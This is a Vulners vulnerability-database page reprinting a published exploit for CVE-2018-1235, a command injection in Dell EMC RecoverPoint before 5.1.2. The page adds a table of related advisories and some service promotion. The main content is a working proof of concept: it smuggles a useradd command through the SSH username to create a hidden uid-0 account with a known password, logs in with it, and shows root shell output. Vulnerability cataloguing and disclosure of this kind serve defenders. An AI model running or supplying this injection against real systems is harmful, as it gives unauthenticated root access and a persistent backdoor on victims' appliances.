Vulners
Lucene search
Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution Vulnerability
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
 | Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution Vulnerability | 22 Jun 201800:00 | – | zdt |
 | Dell EMC RecoverPoint and RecoverPoint for Virtual Machines Remote Code Execution Vulnerability | 25 May 201800:00 | – | cnvd |
 | CVE-2018-1235 | 29 May 201817:00 | – | cve |
 | CVE-2018-1235 | 29 May 201817:00 | – | cvelist |
 | Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution | 21 Jun 201800:00 | – | exploitdb |
| Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution | 21 Jun 201800:00 | – | exploitdb |
 | Dell EMC RecoverPoint 5.1.2 - Local Root Command Execution | 21 Jun 201800:00 | – | exploitpack |
| Dell EMC RecoverPoint 5.1.2 - Remote Root Command Execution | 21 Jun 201800:00 | – | exploitpack |
 | CVE-2018-1235 | 29 May 201817:29 | – | nvd |
 | Dell EMC RecoverPoint Remote Root | 21 Jun 201800:00 | – | packetstorm |
10
# Exploit Title: Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution
# Version: All versions before RP 5.1.2, and all versions before RP4VMs 5.1.1.3
# Vendor KB: https://support.emc.com/kb/521234
# Github: https://github.com/bao7uo/dell-emc_recoverpoint
# Website: https://www.foregenix.com/blog/foregenix-identify-multiple-dellemc-recoverpoint-zero-day-vulnerabilities
# Tested on: RP4VMs 5.1.1.2, RP 5.1.SP1.P2
# CVE: CVE-2018-1235
# 1. Description
# An OS command injection vulnerability exists in the mechanism which processes usernames
# which are presented for authentication, allowing unauthenticated root access via
# the ssh service.
# 2. Proof of Concept
# Inject into ssh username.
# N.B. combined length of new username+password is limited to 21 due to injection length limitations
$ ssh '$(useradd -ou0 -g0 bao7uo -p`openssl passwd -1 Secret123`)'@192.168.57.3
Password: ^C
$ ssh [email protected]
Password: Secret123
Could not chdir to home directory /home/bao7uo: No such file or directory
[email protected]:/# id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:/#
# 0day.today [2018-06-22] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Jun 2018 00:00Current
7.1High risk
Vulners AI Score7.1
EPSS0.5175